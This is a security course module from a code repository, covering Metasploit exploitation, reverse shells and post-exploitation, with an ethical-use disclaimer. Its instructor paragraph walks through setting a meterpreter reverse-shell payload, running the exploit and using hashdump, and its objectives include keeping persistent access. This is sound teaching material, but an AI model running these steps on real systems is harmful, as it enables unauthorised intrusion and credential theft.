jramos/seclab
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
seclab/MOD3_Exploitation.md
jramos 6d0035721e initial commit
2026-05-28 18:27:41 -06:00

2.5 KiB
Raw Permalink Blame History

FILE: MOD3_Exploitation.md

MODULE 3: EXPLOITATION & POST-EXPLOITATION

⚠️ ETHICAL USE DISCLAIMER

This module teaches offensive security techniques for AUTHORIZED ENVIRONMENTS ONLY.

  • All exploits demonstrated are against VMs you own
  • Never use these techniques on systems without explicit written permission
  • Unauthorized computer access is illegal (Computer Fraud and Abuse Act, 18 U.S.C. § 1030)
  • Purpose: Learn offensive techniques to better defend systems

Learning Objectives

By completing this module, you will:

  • Match discovered services to known CVEs (Common Vulnerabilities and Exposures)
  • Configure and execute exploits using Metasploit Framework
  • Understand the difference between bind and reverse shells
  • Perform post-exploitation enumeration and privilege escalation
  • Maintain persistent access to compromised systems (lab environment only)
  • Document exploitation chains for penetration testing reports

Key Concepts

Vulnerability Assessment

CVE (Common Vulnerabilities and Exposures): Standardized identifiers for publicly known security vulnerabilities.

The Metasploit Framework

Architecture:

  • Exploits: Code that takes advantage of vulnerabilities
  • Payloads: Code executed after successful exploit (shells, backdoors)
  • Auxiliary: Scanner and fuzzer modules (non-exploit)
  • Post: Post-exploitation modules (privilege escalation, credential harvesting)

Shells Explained

Reverse Shell (Attacker Listens):

Attacker                    Target
   |                           |
   |      (Listening :4444)    |
   |<--- Connect to Attacker --| (Target initiates connection)
   |---- Shell Access -------->|

Why better? Bypasses inbound firewall rules. Victim initiates "outbound" connection.

Professor's Guide

Once you select an exploit (use exploit/...), you must configure the RHOSTS (Remote Host / Target IP) and your LHOST (Local Host / Kali IP). The payload is crucial—set it to a reverse shell (set payload linux/x86/meterpreter/reverse_tcp). When you type exploit, Kali will send the malicious traffic, and if successful, the target will connect back to you, bypassing inbound firewall rules. Once you have the Meterpreter session, practice commands like sysinfo, hashdump, and shell to interact with the compromised operating system.

CONTINUED IN FULL VERSION - See MOD3_Exploitation_FULL.md for complete detailed labs

END OF MODULE 3 PREVIEW

Reference in New Issue View Git Blame Copy Permalink